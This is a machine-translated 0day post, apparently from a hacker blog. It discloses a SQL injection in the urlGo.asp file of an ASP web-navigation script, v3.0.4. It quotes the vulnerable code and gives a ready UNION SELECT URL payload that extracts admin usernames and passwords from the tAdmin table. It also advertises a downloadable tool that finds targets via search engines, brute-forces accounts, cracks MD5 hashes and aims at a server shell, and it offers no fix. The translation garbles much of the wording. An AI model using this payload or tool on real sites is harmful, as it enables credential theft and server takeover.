Deep Learning (asp) URL navigation v3.0.4 0day

Alimail love S Blog http://www.virusest.com/
Deep Learning (asp) web site navigation v3.0.4 SQL Injection Vulnerability
Problem code urlGo. asp:
<! -- # Include file = "connDB. asp" -->
<! -- # Include file = "include/Function. Common. asp" -->
<%
Id = request. QueryString ("id ")
If id = "" then
Response. Redirect ("/")
End if
----- URL --------------
Set rsWebUrl = Server. CreateObject ("Adodb. Recordset ")
SqlC = "select * from tWebUrl where fpassed = 1 and fid =" & id
RsWebUrl. open sQLC, conn, 0, 1
If rsWebUrl. Eof and rsWebUrl. Bof then
Response. Redirect ("/")
Else
%>
Obviously, the header file can be injected. due to the negligence of the programmer, the header file does not call the anti-injection system. Other files call anti-injection.
Usage: note that the injection points cannot be detected by the hacker or the hacker. Simply write the injection statement:
Http: // localhost/urlGo. asp? Id = 4233% 20and % 201 = 2% 20 union % 20 select % ,,2, fusername, 10%, 20 from % 20 tAdmin
You only need to change the fusername to fpassword to check the password. However, during the test, it is found that the table segment length may be different due to different versions. If the number of columns is not matched, change it to 9.
Here, I wrote a tool to use, a silly intrusion, where the ID value is the ID seen in the search engine ,:
The tool integrates functions such as brute-force password account, background access, and MD5 Cracking for database downloads. For tools and source code, see the attachment.
Not shelled. You are welcome to tamper with the copyright! I haven't written a program for a long time. Just be a trainer!
Ps: it is difficult to use Shell in the background, prompting the Shell database to restore it to the backup first, and then a sentence!

Click here to download shendu.rar